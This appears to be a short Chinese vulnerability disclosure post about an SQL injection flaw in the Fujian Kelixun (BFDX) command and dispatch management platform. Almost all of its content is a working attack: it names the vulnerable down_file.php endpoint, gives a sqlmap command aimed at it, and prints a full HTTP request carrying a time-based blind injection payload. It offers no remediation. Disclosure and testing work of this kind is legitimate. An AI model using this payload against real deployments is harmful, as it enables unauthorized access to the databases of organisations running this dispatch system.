福建科立讯通信 指挥调度管理平台 SQL注入漏洞

北峰通信-福建科立讯通信 指挥调度管理平台 SQL注入漏洞

厂商域名和信息收集

域名:

工具sqlmap

python sqlmap.py -u "http://ip:端口/api/client/down_file.php?uuid=1" --batch

数据包

GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%203018%20FROM%20(SELECT(SLEEP(5)))PUiO)%20AND%20%27ayNf%27=%27ayNf HTTP/1.1

Host: ip:端口

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Cookie: PHPSESSID=8gnvk03ni3efhhsf6s6utobua6

Upgrade-Insecure-Requests: 1

Priority: u=0, i

相关推荐
bilin_jam7 分钟前
C++查询mysql数据
数据库·c++·mysql
爱吃糖的小秦同学12 分钟前
MySQL 8.4.4详细下载安装配置
数据库·mysql
NPE~17 分钟前
基于MySQL实现基础图数据库
数据库·sql·mysql·教程·图数据库·图结构
技术卷18 分钟前
详解力扣高频SQL50题之550. 游戏玩法分析 IV【中等】
sql·mysql·leetcode·oracle
学Linux的语莫24 分钟前
k8s的nodeport和ingress
网络·rpc·kubernetes
样子201833 分钟前
Sql注入 之sqlmap使用教程
数据库·sql
网络~小白37 分钟前
MSTP技术
网络
GottdesKrieges1 小时前
obd运维OceanBase数据库的常见场景
运维·数据库·oceanbase
安 当 加 密1 小时前
守护汽车“空中升级“:基于HSM/KMS的安全OTA固件签名与验证方案
安全·汽车
嶔某2 小时前
网络:应用层
linux·服务器·网络·c++